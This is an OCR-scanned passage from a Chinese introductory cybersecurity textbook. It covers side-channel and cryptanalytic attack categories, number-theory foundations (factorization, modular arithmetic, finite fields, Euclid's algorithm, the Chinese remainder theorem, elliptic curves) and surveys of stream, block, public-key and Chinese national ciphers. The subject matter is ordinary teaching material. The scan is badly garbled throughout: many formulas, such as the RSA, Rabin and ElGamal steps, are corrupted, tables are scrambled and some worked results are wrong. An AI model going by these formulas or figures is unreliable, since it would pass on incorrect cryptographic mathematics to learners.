击 ,缓存 攻击 等 非 侵入 式 攻击 。 但 广义 上 讲 , 针 对 任何 安全 设备 的 侵入 式 、 半 侵入 式 、 非 侵 
入 式 攻 击 , 这 类 “ 旁 门 左 道 ” 的 攻击 均 属 于 侧 信 道 攻击 范畴 。 在 这 些 攻 击 手段 中 , 侵入 式 、 
半 侵 入 式 攻 击 的 难度 偏 高 , 设备 昂贵 , 因而 实施 的 代价 较 大 。 缓 存 攻击 对 实施 场景 要 求 
很 高 ， 较 难 实际 应 用 。 能 量 攻 击 .电磁 攻击 等 方法 设备 成 本 低 、 侧 信息 采集 方便 、 信 噪 比 
较 高 ,在 实际 中 相对 容易 实现 。 而 故障 攻击 在 时 间 、 空 间 上 均 可 精确 定位 ,故障 注入 手段 
也 不 拘 一 格 ,因而 在 攻击 一 些 带 防护 的 密码 模块 时 往往 有 奇效 。 近 几 年 来 , 物 联网 设备 、 
工业 控制 系统 .手机 、 智 能 终端 等 设备 都 成 了 侧 信道 攻击 者 热衷 研究 的 对 象 。 

密码 分 析 的 成 功 除 了 靠 上 述 的 数学 演绎 和 归纳 法 外 ,还 要 利用 大 胆 的 猜测 和 对 一 些 
特殊 或 异常 情况 的 敏感 性 。 例 如 , 若 幸运 地 在 两 份 密 报 中 发 现 了 相同 的 码 字 或 片断 ,就 可 
假定 这 两 份 报 的 报头 明文 相同 。 又 如 ,在 战地 条 件 下 ,根据 战事 情况 可 以 猜测 当时 收 到 的 
报 文中 某 些 密 文 的 含义 ,如 “攻击 "或 开炮” 等。 依靠 这 种 所 谓 的 “可 能 字 法 ”, 常 常 可 以 幸 
运 地 破译 一 份 报 文 。 

一 个 保密 系统 是 否 被 "攻破 ”, 并 无 严格 的 标准 。 若 不 管 采 用 什么 密 钥 ,敌手 都 能 从 密 
文 迅速 地 确定 出 明文 , 则 此 系统 当然 已 被 攻破 ,这 也 就 意味 着 敌手 能 迅速 确定 系统 所 用 的 
密 钥 。 但 破译 者 有 时 可 能 满足 于 能 从 密 文 偶然 确定 出 一 小 部 分 明文 ,虽然 此 时 保密 系统 
实际 上 并 未 被 攻破 ,但 部 分 机 密 信息 已 被 泄露 。 

密码 史 表 明 ,密码 分 析 者 的 成 就 似乎 远 比 密码 设计 者 的 成 就 更 令 人 赞叹 。 许 多 开始 
时 被 设计 者 吹 趴 为 “百年 或 千年 难 破 ” 的 密码 , 没 过 多 久 就 被 密码 分 析 者 巧妙 地 攻破 了 。 


2.2.3 ”密码 学 理论 基础 


早期 密码 算法 的 安全 性 主要 依赖 于 算法 设计 者 的 经 验 及 对 已 有 攻击 方法 的 分 析 , 而 
现代 密码 算法 的 安全 性 主要 建立 在 数学 困难 问题 之 上 。 可 证 明 安全 技术 就 是 建立 密码 算 
法 和 这 些 数学 困难 问题 之 间 关 系 的 桥梁 。 通 俗 来 讲 , 可 证 明 安全 理论 如 同 数学 定理 的 证 
明 一 样 ,可 以 证 明 一 个 密码 算法 是 安全 的 ,从 而 使 得 人 们 对 现实 中 使 用 密码 算法 的 安全 性 
充满 信心 。 本 节 简 要 介绍 密码 算法 设计 中 使 用 的 一 些 基本 数学 知识 。 


1. 整数 分 解 
整数 分 解 (Integer Factorization) 又 称 为 素 因 数 分 解 (Prime Factorization) , 即 任意 一 
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个 大 于 1 的 自然 数 都 可 以 写成 素数 乘积 的 形式 。 根 据 算术 基本 定理 : 任意 一 个 大 于 1 的 
自然 数 N ,如 果 N 不 为 素数 ,那么 N 可 以 被 唯一 分 解 成 有 限 个 素数 的 乘积 N = 
PP2P3…P?” ,此 处 Pi 二 Ps 二 P3… 二 P， 均 为 素数 ,其 中 ,指数 a; 是 正 整数 ,该 分 解 
称 为 N 的 标准 分 解 式 。 整 数 分 解 是 数论 中 的 一 个 基本 问题 ,从 其 诞生 到 现在 已 有 数 百 年 
历史 ,整数 分 解 在 代数 学 .密码 学 .计算 复杂 性 理论 和 量子 计算 等 领域 中 有 重要 应 用 。 

RSA 是 第 一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 ,诞生 于 1977 年 ,以 三 位 
发 明 者 Rivest\Shamir 和 Adleman 名 字 的 首 字 母 命名 ,其 安全 性 依赖 于 大 整数 分 解困 难 
问题 : 即 找到 两 个 大 素数 并 计算 它们 的 乘积 是 容易 的 ,而 知道 这 一 乘积 逆向 求 它 的 因子 
是 困难 的 。 当 一 个 整数 足够 大 时 ,如 长 度 为 1024 比特 的 整数 ,采用 蛮 力 方式 分 解 它 是 困 
难 的 ,这 也 是 RSA 密码 体制 的 安全 所 在 。 为 了 鼓励 更 多 的 人 加 入 整数 分 解 的 研究 ,跟踪 
整数 分 解 研究 进展 ,1991 年 启动 了 “RSA 因子 分 解 大 挑战 ?项 目 , 表 2-7 是 自 2000 年 以 来 
RSA 模 数 分 解 情况 。 


表 2-7 RSA 模 数 分 解 情况 


RSA 数字 十 进 制 数 二 进 制 数 分 解 时 间 
RSA-150 150 496 2004 年 4 月 
RSA-170 170 563 2009 年 12 月 
RSA-180 180 596 2010 年 5 月 
RSA-190 190 629 2010 年 11 月 
RSA-200 200 663 2005 年 3 月 
RSA-210 210 696 2013 年 9 月 
RSA-704 212 704 2012 年 7 月 
RSA-768 232 768 2009 年 12 月 
RSA-240 240 795 2019 年 12 月 


目前 已 有 十 几 种 大 整数 分 解 的 算法 ,具有 代表 性 的 有 试 除法 、 二 次 得 法 (Quadratic 
Sieve,QS) ,椭圆 曲线 方法 (Elliptic Curve Method,.ECM) 以 及 数 域 得 法 (Number Field 


Sieve,NFS) 等 , 表 2-8 展示 了 典型 的 整数 分 解 算法 优 缺 点 。 
Ros ”典型 大 整数 分 解 算法 优 缺 点 比较 

算法 名 称 | 分 解 对 象 优点 WA 
简单 并行 度 好 ,适合 分 解 随机 选 | 时 间 复杂 度 最 高 ,只 适用 于 
nin 小 规模 整数 。 | 取 的 或 者 拥有 小 质数 因子 的 整数 | 分 解 小 规模 整数 
P+1 小 规模 整数 。 | 信人 具有 小 质 因子 的 数 容易 被 | 通用 性 不 好 ,实用 性 不 强 
'TFTYYI 结构 简单 ,内 存 使 用 量 少 ,是 所 有 | 。 
(ECMD) 中 等 规模 整数 基于 平滑 性 的 算法 中 运行 最 快 的 did 
二 次 得法 (QS) | 中 等 规模 整数 。 | 并 行 度 高 ,通用 性 强 内 存 需求 高 
数 域 第 法 | cuia | 分 解 天 规模 整数 速度 忆 * 通 用 性 | 算法 复杂 ,内 存 需求 高, 工程 
(GNFS) 高 ,并 行 度 好 ,实用 性 强 难度 大 
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2. 模 运算 

模 运 算 即 求 余 运算 。“ 模 ”是 Mod 的 音译 ,Mod 的 含义 为 求 余 , 模 运算 在 数论 和 程序 
设计 中 有 着 广泛 应 用 ,从 模 符 运算 到 最 大 公约 数 的 求法 ,从 孙子 问题 到 已 撤 密 码 问 题 ,都 
离 不 开 模 运算 。 

给 定 一 个 正 整 数 ,任意 一 个 整数 a ,一 定 存在 等 式 : 


n 


其 中 ,Lx | 表示 小 于 或 等 于 xz 的 最 大 整数 ,gq ,r 都 是 整数 , 称 qa 除 以 的 商 ,r 为 a 除 


a —qn-cr. Oxr-n. Sri 


a 


以 的 余数 。 用 a mod n AURA CHE am nna mod n。 对 于 正 整 数 n 和 整数 a 


n 
与 65, 定义 如 下 运算 : 

(D 取 模 运算 :a mod n ,表示 a 除 以 n 的 余数 ; 

Q) BE n 加 法 ; (a 十 5) mod nn ,表示 a 与 b 的 算术 和 除 以 n 的 余数 ; 

Q) Bin Wü: (a—b) mod nn ,表示 a 5 b 的 算术 差 除 以 n 的 余数 ; 

CD BE n 乘法 : (a Xb) mod nn, 表示 a 与 b 的 算术 乘积 除 以 n 的 余数 ; 

(Q cR s TE: 若 存 在 ab 二 1 mod n Jl] a wb 称 为 模 的 可 逆 元 ,ab HOC. 

若 a mod n —b mod nn, 则 称 整 数 a 和 4b 模 n 同 余 , 记 为 a 三 b mod n。 此 外 模 运 算 的 
基本 运算 规则 如 下 : 


(D Ca -b) mod n —(a mod n--b mod n) mod n 


Q) (a —b) mod n —(a mod n —5 mod ») mod n 

®@ (a Xb) mod n —((a mod n) X (b mod n)? mod n 

一 般 地 ,定义 Z, 为 小 于 的 所 有 非 负 整数 集合 , 即 Z, m (0.1. D , 称 Z, 为 模 
n 的 同 余 类 集合 。 

[812-1] i Z;—(0.1.2.3.4.5) ,计算 Z。 上 的 模 加 运算 和 模 乘 运算 ,如 表 2-9 
所 示 。 


表 2-9 模 6 加 法 和 乘法 运算 


c &Uww-25oc|- 
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0 
0 
0 
0 
0 
0 
0 


€ wb 


0 
1 
2 
3 
4 
5 


由 模 加 运算 结果 可 见 , 对 Vz,3y 使 得 t+ 十 y 二 0 mod 6, 称 y 为 x 的 负数 (加 法 北 
元 ) ,如 对 1, 整 数 5 使 得 1 十 5 二 0 mod 6。 对 模 乘 运算 : 若 对 于 z 存在 y, 使 得 +Xy=1 
mod 6, 则 称 y 为 xz 的 乘法 递 元 ,如 2X3==1 mod 6。 

模 指数 运算 : 对 给 定 的 正 整数 mm 与 ,计算 a” mod n. 
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【 例 2-2〗 若 "一 7,” 一 19, 则 易 求 出 7 二 7 mod 19,7*—11 mod 19,7*—1 mod 19。 
由 于 7 六 二 73。7 一 7 mod 19, 所 以 7 一 ?3。7 一 7 mod 19.75 —7* mod 19,…, 即 从 

7* mod 19 开始 所 求 的 寡 出 现 循环 ,故而 循环 周期 为 3。 


3. 有 限 域 

代数 结构 是 对 要 研究 的 现象 或 过 程 建立 的 一 种 数学 模型 ,模型 中 包括 要 处 理 的 数学 
对 象 的 集合 以 及 几何 上 的 关系 或 运算 。 运 算 可 以 是 一 元 的 或 多 元 的 ,可 以 有 一 个 或 者 多 
个 。 下 面 将 要 介绍 的 群 、 环 \、 域 都 是 代数 结构 。 

定义 2-1( 群 ): 设 G 是 一 个 集合 , * 是 G 上 的 运算 ,(G,* ) 是 一 个 代数 结构 ,如 果 * 
满足 : 

@ 封闭 性 ; 车 Va,bEG, 有 ax*bEG。 

Q 结合 律 : 车 Ya,b6,cEG, 有 (ab)c=a (bc). 

@ 单位 元 : 车 3eEG ,使 得 YaEG 有 ea 二 ae = 二 a。 

(D 逆 元 : 若 VaEG ,存在 元 素 a ! 使 得 a a! —a  *ae, 

则 称 (G, * ) 为 群 , 简 记 为 G。 特 别 地 , 当 运 算 * 写作 乘法 时 ,G 称 为 乘 群 :运算 * 写 
作 加 法 时 ,G 称 为 加 群 。 群 G 中 元 素 的 个 数 称 为 群 G 的 阶 , 记 为 |G|。 若 群 G 上 的 运算 
还 满足 交换 律 , 即 Ya ,5b5EG, 有 ab—ba , 则 称 群 G 为 交换 群 或 Abel TÉ, 

【 例 2-3】 整数 集 Z 对 加 法 运算 构成 交换 群 ,对 乘法 运算 不 构成 群 。 

定义 2-2( 循 环 群 ): G — (a) — {a 二 e,a,a?,…} 称 为 由 a 生成 的 循环 群 ,a 称 为 生 
成 元 。 

定义 2-3( 环 ): 设 (R, 十 ,三 ) 是 一 个 代数 结构 ,十 和 二 满足;  (R ,十 ) 是 交换 群 ; 
@(R,，) 是 半 群 (运算 仅 满足 封闭 性 和 结合 律 );@ 二 对 十 具有 分 配 律 , 即 YVa,b,c ER,， 
7H a (b-c) —ab-Fac I (54-c)a —ba 4-ca , 则 称 (R ,十 ,= 二) 为 环 。 

定义 2-4( 域 ) : 设 ( 下 ,十 ,= 是 一 个 代数 结构 ,十 和 三 满足 : DF ,十 ) 是 交换 群 ; 
QXFN(0) ,三 ) 是 交换 群 ;@== 对 十 具有 分 配 律 , 即 YVYa,b,cEFf, 有 a(b 十 c) 二 ab 十 ac 和 
5 十 ca 二 ba 十 ca, 则 称 (FF, 十 ,= 二) 为 域 。 有 限 域 是 指 元 素 个 数 有 限 的 域 ,又 被 称 为 
Galois 域 。 有限 域 的 元 素 个 数 一 定 是 某 个 素数 的 颇 , 通 常 表示 为 GF(p")。 其 中 ,最 常用 
的 两 个 有 限 域 为 GF(p)( 当 ==1 时 ) 和 GF(2")( 当 p=2 时 ), 例 如 GF(11),GF(23)。 

【 例 2-4】 有 限 域 GF(11) 的 加 法 运算 。 

GF(11) 的 加 法 运算 如 表 2-10 所 示 。 


表 2-10 GF(11) 的 加 法 运算 


本 0 1 2 3 4 5 6 7 8 9 10 
0 0 1 2 3 4 5 6 7 8 9 10 
l 1 2 3 4 5 6 7 8 9 10 0 
2 2 3 4 5 6 7 8 9 10 0 1 
3 3 4 5 6 7 8 9 10 0 * 2 
4 4 5 6 7 8 9 10 0 1 2 3 
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续 表 
t 0 1 2 3 4 5 6 5 8 9 10 
5 5 6 7 8 9 10 0 1 2 3 4 
6 6 7. 8 9 10 0 1 2 3 4 5 
7 7 8 9 10 0 1 2 3 4 5 6 
8 8 9 10 0 1 2 3 4 5 6 
9 9 10 0 1 2 3 4 5 6 7 8 
10 10 0 1 2 3 4 5 6 7 8 9 


4. 欧 几 里 得 算法 

欧 几 里 得 (Euclid) 算 法 是 数论 中 的 重要 算法 ,可 以 用 来 求 两 个 整数 的 最 大 公 因 子 ,并 
且 当 两 个 正 整数 互 素 时 ,能 够 求 出 一 个 数 关于 另 一 个 数 的 乘法 逆 元 。 

定理 2-1: VE a,b. 是 两 个 任意 正 整数 ,它们 的 最 大 公 因 子 记 为 gcd (a ,2) , 简 记 为 
(a «b) «Dll (a b) — (b.a mod 5). 

i a.b 是 两 个 任意 正 整数 , 记 ro—a.ri—b. ERI EXEIEPR. BD 


ro 一 rigl ras 0<r: =r 


ri=r2qz tra 0 


Fo d Fas Or r.a 
Tap rada b rans ratl 一 0 
由 于 i 二 6br; 放 … 这 rr, 记 rh 之 0, 经 过 有 限 步 之 后 ,一 定 存在 n 使 得 7 ,+ 二 0。 
OD 求 最 大 公 因 子 
在 求 两 个 整数 的 最 大 公 因 子 时 ,可 以 利用 上 述 定理 。 必 有 最 后 一 个 非 零 余数 ,为 a 
Fl 的 最 大 公 因 子 , 即 (a b) —r, s 
〖 例 2-5】 (77.33) — (33.77 mod 33) — (33.11) — (11.0) —11, 
(2) GRE cl o 
若 两 个 数 是 互 素 的 , 即 (a.5) 二 1 时 , 则 5 在 mod a 下 有 乘法 逆 元 。 不 妨 设 ec 之 2 , 即 
存在 k 使 得 bk 三 1 mod a。 在 上 述 的 欧 几 里 得 算法 中 先 求 出 (a ,5), 当 (a .5) 二 1 时 ,返回 
b 的 道 元 。 
定理 2-2: E a,b 是 两 个 任意 正 整 数 , 则 sa 1,0 — (a b) ,其 中 ,sj; t; (0 过 j 过 n) 定 
义 为 
ARM, —sj23—qjasja joideena 
to=0,t1=1,t; —tj2 —qjatja 
其 中 ,qi 是 不 完全 商 。 
因此 ,根据 上 述 定理 ,车 a 和 2 互 素 . 则 有 sua c t,b — (a.b) —1. WW c, 为 2 的 乘法 
逆 元 。 
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5. 中 国 剩余 定理 

中 国 剩余 定理 最 早 见 于 《孙子 算 经 》,“ 今 有 物 不 知 其 数 , 三 三 数 之 剩 二 ( 除 以 3 余 2)， 
五 五 数 之 剩 三 ( 除 以 5 ZR 30 ,七 七 数 之 剩 二 ( 除 以 7 余 2), 问 物 几 何 ?” 这 一 问题 称 为 “孙子 
问题 ”", 其 一 般 解 法 国际 上 称 为 “中 国 剩余 定理 ”。 中 国 剩余 定理 是 数论 中 重要 的 工具 之 
一 ,能 有 效 地 将 大 数 用 小 数 表示 、 大 数 的 运算 通过 小 数 实现 ;已 知 某 个 数 关 于 两 两 互 素 的 
数 的 同 余 类 集 , 可 以 有 效 重 构 这 个 数 。 


定理 2-3( 中 国 剩余 定理 ) : 假设 mw, manm, 是 两 两 互 素 的 正 整数 , M = [| mi， 
则 一 次 同 余 方程 组 


— a, (mod mj) 


SS 


SB 


— as(mod m;) 


— a, (mod m,) 


对 模 M 有 唯一 解 : 


M M M 
rz (Sia, 十 一 cs2z dc eu] (mod M) 
ms m2 m, 


其 中 ,e; 满足 xs 1 (mod mi)(i=1,2,.°,k)。 
【 例 2-6】 由 以 下 方程 组 求 x 


x 三 2(mod 3) 
7X 三 3(mod 5) 
xX 三 2(mod 7) 
M M M 
fig: M—3X5X7-—105.Mi 35.M; 21, M;— 15 
nmi; m2 ns 


EK ei 三 Mi! mod 3—2,.e; — Mz! mod 5—1.e; —M;! mod 7 二 1, 所 以 x mod 105— 
(385X2X2--21X1X3--15X1X2) mod 1052223, 


6. 椭圆 曲线 

椭圆 曲线 并 非 椭 圆 ,由 于 椭圆 曲线 方程 与 计算 椭圆 周 长 积 分 公式 类 似 , 所 以 称 为 椭圆 
曲线 。 一 般 地 ,椭圆 曲线 为 如 下 形式 的 曲线 方程 

y! Fary--by = 二 zx? 十 cx? 十 dr 十 e 

其 中 ,a ,b,c,d,e 为 满足 条 件 的 实数 。 定 义 一 个 称 为 无 穷 远 点 的 元 素 , 记 为 0, 也 称 为 理 

图 2-19 为 椭圆 曲线 实例 。 从 图 中 可 以 看 到 ,椭圆 曲线 是 相对 x 轴 对 称 。 

定义 椭圆 曲线 上 的 加 法 运算 : 若 其 上 3 个 点 位 于 同一 直线 上 , 则 3 个 点 的 和 为 O。 
进一步 定义 椭圆 曲线 上 加 法 法 则 : 

(D 0 为 加 法 单位 元 , 即 对 于 椭圆 曲线 上 任意 点 P, 有 PP 二 0 二 P。 

回 设 P=(zy) 是 椭圆 曲线 上 的 点 ,定义 其 加 法 逆 元 P; 二 一 Pi 二 (z+, 一 y); 将 
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(b) 2-3 


图 2-19 椭圆 曲线 实例 


P1,P; 的 连 线 延长 到 无 穷 远 点 0, 得 Pi 十 Ps 十 0 二 O,Pi 十 Ps 二 0, 即 Ps= 一 Pi。 

@ 设 A 和 B 是 椭圆 曲线 上 x 坐标 不 同 的 点 ,定义 A 十 B: 画 一 条 通过 A,B 的 直线 ， 
其 与 椭圆 曲线 相交 于 P,A 十 B 十 P==O0,A 十 B= 一 P。 

@ 定义 点 Q 的 倍数 : 在 Q 点 做 椭圆 曲线 的 一 条 切线 , 设 切 线 与 椭圆 曲线 交 于 点 C， 
2A 二 A 十 A 二 一 C ,类似 地 ,定义 3A 二 A 十 A 十 A 二 …。 

以 上 定义 的 加 法 具有 加 法 运算 的 一 般 性 质 , 如 交换 律 等 。 

密码 中 大 多 采用 有 限 域 上 非 奇 异 椭圆 曲线 ,有 限 域 上 非 奇异 椭圆 曲线 方程 形式 如 下 : 

y! =x -Far-Fb (a,b € GF(5) .4a* 4- 27b? #0) 

其 中 ,a o 为 有 限 GF(p) 中 元 素 .p 为 大 素数 。 
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2.2.4 国内 外 密码 算法 概览 


1. 序列 密码 

序列 密码 又 称 为 流 密码 ,是 一 种 对 称 密码 体系 , 它 是 对 “一 次 一 密 ? 的 一 种 效仿 。“ 
次 一 密 ” 密 钥 较 长 ,实用 性 较 差 ,于 是 人 们 便 仿照 一 次 一 密 ” 的 思路 ,通过 利用 较 短 的 种 子 
密 钥 来 生成 较 长 的 密 钥 序列 ,来 实现 类 似 于 “一 次 一 密 ” 的 加 密 , 并 且 达 到 较 好 的 可 用 性 。 

序列 密码 的 加 密 工 作 过 程 如 图 2-20 所 示 , 已 知 明 
文 序列 ,算法 的 关键 部 分 是 密 钥 流 的 生成 。 密 钥 流 由 
密 钥 流 发 生 器 / 生成 ,可 定义 为 x; 二/(k,o;) 的 形式 。 
其 中 ,o; 是 加 密 器 中 存储 器 (记忆 元 件 ) 在 i 时 刻 的 状 
态 , 为 种 子 密 钥 。 密 钥 流 和 明文 流 进行 异 或 运算 , 即 
输出 密 文 流 , 解 密 过 程 同 理 。 

序列 密码 具有 实现 简单 、 低 错误 传播 等 优点 ,适用 于 军事 、 外 交 等 机 密 机 构 ,能 为 保障 
国家 信息 安全 发 挥 重 要 作用 。2004 年 ,欧洲 序列 密码 工程 (eSTREAM) 启 动 ,征集 了 一 
批 优秀 的 序列 密码 算法 ,其 第 三 轮 评估 结果 (2008 年 4 月) 如 表 2-11 所 示 。 该 工程 对 算 
法 研究 进行 了 分 类 归纳 ,尽量 多 地 给 出 了 相关 文献 ,对 其 中 算法 感 兴趣 的 研究 者 可 以 参考 
各 阶段 评估 报告 及 SASC 系列 会 议 。 

表 2-11 eSTREAM 第 三 轮 评估 结果 


TEL [augue 


eere 
明文 序列 (y SOOREBI 
图 2-20 ”序列 密码 加 密 工 作 过 程 


分 类 选中 算法 落选 算法 

Salsa20 Rabbit NLS v2 LEX v2 

软件 实现 算法 
Sosemanuk HC-128 CryptMT v3 Dragon 
] Trivium Grain v1 Decim v2 Edon 80 

硬件 实现 算法 

F-FCSR-H v2 MICKEY v2 Pomaranch v3 Moustique 
2. 分 组 密码 


不 同 于 序列 密码 , 另 一 种 基于 单 密 钥 的 对 称 加 密 体制 是 分 组 密码 。 分 组 密码 是 将 明 
文 消息 编码 后 的 序列 划分 成 长 度 为 n 的 分 组 ,通过 密 钥 和 算法 对 其 加 密 运算 ,输出 等 长 
的 密 文 分 组 。 

不 同 的 分 组 密码 具有 不 同 的 结构 ,常见 的 有 代替 一 置换 网 络 、Feistel 网 络 等 结构 。 
代替 一 置换 网 络 结构 由 混淆 和 扩散 两 个 部 分 组 成 ,混淆 是 将 密 文 与 密 钥 之 间 的 统计 关系 
变 得 尽 可 能 复杂 ,使 得 对 手 即使 获取 了 关于 密 文 的 一 些 统计 特性 ,也 无 法 推测 密 钥 。 扩 散 
是 让 明文 中 的 每 一 位 影响 密 文中 的 许多 位 ,或 者 说 让 密 文中 的 每 一 位 受 明 文中 的 许多 位 
的 影响 。 这 样 可 以 隐蔽 明文 的 统计 特性 。 分 组 密码 的 行为 应 当 看 起 来 是 一 个 随机 置换 ， 
重复 使 用 混淆 一 扩散 这 一 过 程 ,就 可 以 让 明文 1 比特 的 变化 影响 到 全 部 密 文 ,这 也 是 随机 
置换 所 期 望 的 形式 。 设 计 代 换 一 置换 网 络 时 ,只 要 选择 S 盒 、. 混 合 置换 和 密 钥 编 排 的 时 候 
足够 谨慎 , 它 就 是 构造 伪 随 机 置换 的 一 个 良好 选择 。 例 如 ,AES 算法 结构 类 似 代 换 一 置 
换 网 络 ,普遍 被 认为 是 很 强 的 伪 随 机 置换 ,如 图 2-21 所 示 。Feistel 网 络 是 构造 分 组 密码 

75 


网 络 空间 安全 导论 


的 一 种 替代 方法 ,大 体 结构 如 图 2-22 所 示 , 其 巧妙 的 结构 设计 可 以 不 要 求 轮 函 数 可 逆 。 
这 种 特殊 结构 可 以 不 受到 对 单 轮 /两 轮 代 换 一 置换 网 络 的 攻击 。 


P 
S, | S, 
混 L— 混 混 
合 合 合 
ia 5 S; al 
"eL s B 
x Ea E E 
4H 5, 4H Se 钥 
k LL! k kh 
S, 5 
Pi | 
VS J 
第 ! 轮 第 2 轮 


图 2-21 代 换 -置换 网 络 结构 图 


Hn Ly 


* hd 一 一 一 一 全 wR 
Ly R, hoi 


图 2-22 Feistel 网 络 结构 


分 组 密码 的 明文 信息 具有 和 良好 的 扩展 性 ,有 较 强 的 适用 性 ,并 且 不 需要 密 钥 同 步 ,与 
序列 密码 相 比 更 适合 作为 加 密 标准 。 最 早 的 分 组 密码 是 美国 1977 年 制定 的 数据 加 密 标 
准 一 一 DES。1997 年 ,DES 算法 遭 到 多 次 穷 举 密 钥 攻破 ,同年 美国 国家 标准 与 技术 研究 
院 (NIST) 公 开征 集 和 评估 新 的 数据 加 密 候选 标准 , 即 AES 标准 ,其 条 件 为 : 被 选 作 AES 
的 算法 ,开发 者 必须 承诺 放弃 其 知识 产权 。2000 年 10 月 ,NIST 宣布 Rijndael 算法 为 最 
终 获胜 者 ,并 于 2001 年 11 月 26 日 发 布 新 的 AES 标准 , 即 FIPS 和 PUBS197。AES 标准 
评估 期 间 所 有 的 人 围 算 法 如 表 2-12 所 示 。 


表 2-12 AES 标准 评估 期 间 入 围 算法 


算 法 算 法 名 称 
SAFER 十 CAST-256 CRYPTON E2 
第 一 轮 落选 算法 LOKI 97 DEAL Magenta PROG 
DFC HPC 
第 二 轮 落 选 算法 MARS RC6TM Serpent Twofish 
获胜 算法 Rijndael 
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3. 公 钥 密码 
公 钥 密码 体制 的 思想 是 1976 年 Diffie 和 Hellman 在 他 们 的 论文 “密码 学 的 新 方向 ” 
一 文中 首次 提出 的 。 其 基本 思路 是 : 公 钥 密码 算法 加 密 和 解密 使 用 不 同 的 密 钥 , 其 中 ,一 
个 密 钥 是 公开 的 , 称 为 公开 密 钥 ,简称 公 钥 ,用 于 加 密 或 者 签名 验证 ; 另 一 个 密 钥 是 用 户 专 
有 的 ,因而 是 保密 的 , 称 为 私 钥 , 用 于 解密 或 者 签名 。 公 钥 密 码 算法 的 重要 特性 是 已 知 密 
码 算法 和 加 密 密 钥 ,求解 解密 密 钥 在 计算 上 不 可 行 。 这 个 特性 的 本 质 是 一 个 单 向 陷 门 函 
数 , 定 义 如 下 : 
设 /是 一 个 函数 ,: 是 与 有关 的 一 个 参数 。 给 定 任意 的 x, 则 计算 y= 了 f, (xz) 容易 。 
若 参 数 1 未 知 时 , 则 /的 道 函 数 是 难 解 的 ;但 当 参 数 1 已 知 时 ,了 的 道 函 数 是 容易 求解 的 。 
目前 已 有 多 种 公 钥 密码 算法 ,典型 的 有 基于 大 整数 分 解 的 RSA 算法 及 其 变种 Rabin 
算法 ,基于 离散 对 数 问题 的 ElGamal 密码 体制 和 基于 椭圆 曲线 离散 对 数 问题 的 椭圆 曲线 
密码 体制 (Elliptic Curve Cryptography. ECC)。 
(D RSA 公 钥 密码 算法 
。 密 钥 产 生 : 生成 大 整数 二 pq, 其 中 ,p,q 是 大 素数 。 欧 拉 函 数 pg(n) 二 (p 一 1)(g 
一 1) 。 选 择 整数 e, 满足 1 二 e 二 p(n) 且 gcd(e,gp(n)) 二 1。 计 算 a flf de 
mod p(n)。 公 和 钥 :(e, nn); 私 钥 : d. 
* 加 密 算法 : C—M* mod n. 
。 解密 算法 : M—C" mod n. 
对 RSA 而 言 , 若 ”被 成 功 分 解 , 则 该 体制 被 完全 攻破 , 即 破 解 RSA 算法 的 难度 不 超 
过 分 解 大 整数 的 难度 ,但 还 不 能 证 明 破 解 RSA 算法 等 价 于 求解 大 整数 因子 分 解 问题 。 
(2) Rabin 公 钥 密码 算法 
在 RSA 的 基础 上 ,M. O. Rabin 基于 模 合 数 平方 根 困难 问题 提出 了 一 个 RSA 衍生 
公 钥 密码 算法 ,简称 Rabin 算法 ,从 理论 上 可 以 证 明 Rabin 算法 的 安全 性 等 价 于 求解 大 整 
数 因子 分 解 问题 的 困难 性 ,Rabin 算法 如 下 : 
。 密 钥 产 生 : 随机 选择 大 素数 p .g 满足 p 三 g 三 3 mod 4, 计 算 n==pqg。 公 和 钥 : n; 私 
钥 : p.a. 
* 加 密 算法 : C—M* mod n. 


。 解密 算 法 ， 消息 M 一 士 C 

(3) ElGamal 公 钥 密码 算法 

ElGamal 于 1985 年 提出 ,主要 为 数字 签名 而 设计 , 它 的 安全 性 建立 在 Z; 上 离散 对 
数 问题 的 困难 性 之 上 。 在 其 之 后 ,许多 学 者 对 ElGamal 算法 进行 改进 和 推广 。 例 如 , 美 
国 NIST 提出 著名 的 DSS/DSA 方案 ;1994 年 ,Harn 给 出 18 个 安全 可 行 的 广义 ElGamal 
数字 签名 方案 。 而 破解 ElGamal 加 密 算 法 的 问题 是 由 公 钥 (p ,g ,y) 和 密 文 (C1 ,Cs) 求 解 
消息 M 的 过 程 , 它 实际 上 等 价 于 Diffie-Hellman 问题 , 即 给 定 (g”,g*), 求解 g^. 
ElGamal 密码 体制 具体 算法 如 下 : 

* 密 钥 产生 : 随机 选择 大 素数 p 和 Z，. 上 的 生成 元 8。 随机 选择 一 个 数 z ,计算 y 

—g* mod p. A81: (p,q,y); 私 钥 : xz。 


2+1 
4 


mod p 3k 4$ M—--C * modq. 
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。 加 密 过 程 : 随机 选择 与 p 一 1 互 素 的 整数 ,计算 C= 二 g* mod p.C;—y* * M 
mod p. 

“解密 过 程 : M-CE mod p. 

C 椭圆 曲线 公 钥 密码 算法 (ECC) 

ECC 是 Menezes 和 Vanstone 于 1993 年 设计 的 , 它 可 用 短 得 多 的 密 钥 达到 与 RSA 

算法 同等 的 安全 性 ,因此 具有 广泛 的 应 用 前 景 。ECC 主要 包含 三 个 过 程 : 参数 选取 、 加 

。 密 钥 产生 : 选取 一 条 椭圆 曲线 E, (a ,5) ,将 明文 消息 通过 编码 欢 入 点 M 二 P, , 取 
E,la,b) 生 成 元 G, 任 意 选 择 x € (1, ord(G)), 计 算 Y= xG。 公 和 钥 : 
(G,E,(a,5),Y); 私 钥 : z。 

。 加 密 过 程 : 任意 选择 , 密 文 为 c= 二 (ci ,cz), 其 中 ,cl 二 kG c; 7 MORY., 

。 解密 过 程 : cO; —M. 


4. 国产 密码 

国 密 算法 是 国家 商用 密码 管理 办 公 室 (国家 密码 管理 局 与 中 央 密 码 工 作 领 导 小 组 办 
公 室 ) 指 定 的 一 系列 密码 标准 , 即 已 经 被 国家 密码 管理 局 认定 的 国产 密码 算法 ,又 称 商用 
密码 。 它 能 够 实现 加 密 .解密 和 认证 等 功能 的 技术 ,包括 密码 算法 编程 技术 和 密码 算法 芯 
片 、 加 密 卡 等 的 实现 技术 。 主 要 有 SSF33、SM1(SCB2)、SM2、SM3、SM4、SM7、SM9、 祖 
冲 之 序列 密码 算法 等 。 国 密 算法 包括 对 称 算法 和 非 对 称 算法 ,其 中 ,对 称 算法 包括 
SSF33, SM1, SMA,SM7 .祖冲之 密码 (ZUC) ; 非 对 称 算 法 包括 SM2,SM9。SM3 是 杂凑 
算法 。 祖 冲 之 序列 密码 算法 是 运用 于 移动 通信 4G 网 络 中 的 国际 标准 密码 算法 。SM]1 和 
